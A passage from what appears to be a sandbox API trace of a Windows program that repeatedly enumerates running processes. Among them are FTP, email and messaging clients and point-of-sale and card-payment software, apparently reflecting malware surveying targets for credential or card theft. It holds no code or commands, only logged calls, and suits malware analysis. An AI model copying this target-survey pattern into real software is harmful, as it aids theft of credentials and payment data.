lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.344] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0232.348] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0232.351] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0232.366] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0232.368] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0232.371] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0232.373] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0232.444] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0232.447] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0232.449] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0232.451] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0232.492] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0232.495] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0232.498] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0232.500] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0232.502] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0232.504] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0232.508] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0232.510] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0232.512] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0232.515] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0232.517] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0232.559] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0232.562] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0232.564] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0232.567] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0232.570] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0232.572] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0232.574] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0232.577] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0232.580] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0232.582] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0232.585] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0232.587] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0232.589] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0232.592] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0232.594] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0232.596] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="outlook.exe")) returned 1 [0232.601] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="thunderbird.exe")) returned 1 [0232.603] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="smartftp.exe")) returned 1 [0232.605] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="skype.exe")) returned 1 [0232.607] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1204, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="scriptftp.exe")) returned 1 [0232.609] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x120c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="afr38.exe")) returned 1 [0232.611] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1214, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="trillian.exe")) returned 1 [0232.613] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x121c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="winscp.exe")) returned 1 [0232.616] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1224, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="yahoomessenger.exe")) returned 1 [0232.617] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="edcsvr.exe")) returned 1 [0232.619] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1238, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="creditservice.exe")) returned 1 [0232.622] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ccv_server.exe")) returned 1 [0232.625] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1248, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="aldelo.exe")) returned 1 [0232.627] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="centralcreditcard.exe")) returned 1 [0232.628] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1258, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="accupos.exe")) returned 1 [0232.630] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1260, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="active-charge.exe")) returned 1 [0232.632] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1268, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="webdrive.exe")) returned 1 [0232.634] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="whatsapp.exe")) returned 1 [0232.643] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1280, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="isspos.exe")) returned 1 [0232.647] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="mxslipstream.exe")) returned 1 [0232.649] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fpos.exe")) returned 1 [0232.651] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0232.652] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0232.655] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0232.658] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0232.660] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0232.662] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0232.663] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0232.666] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0232.668] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0232.670] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0232.672] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0232.673] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0232.675] Process32Next (in: hSnapshot=0x2268, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0232.677] CloseHandle (hObject=0x2268) returned 1 [0232.677] Sleep (dwMilliseconds=0x64) [0232.785] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2200 [0232.799] Process32First (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0232.801] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0232.803] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0232.804] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.806] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0232.808] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0232.809] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0232.812] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0232.814] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0232.816] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.818] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0232.820] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0232.863] Process32Next (in: hSnapshot=0x2200, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, 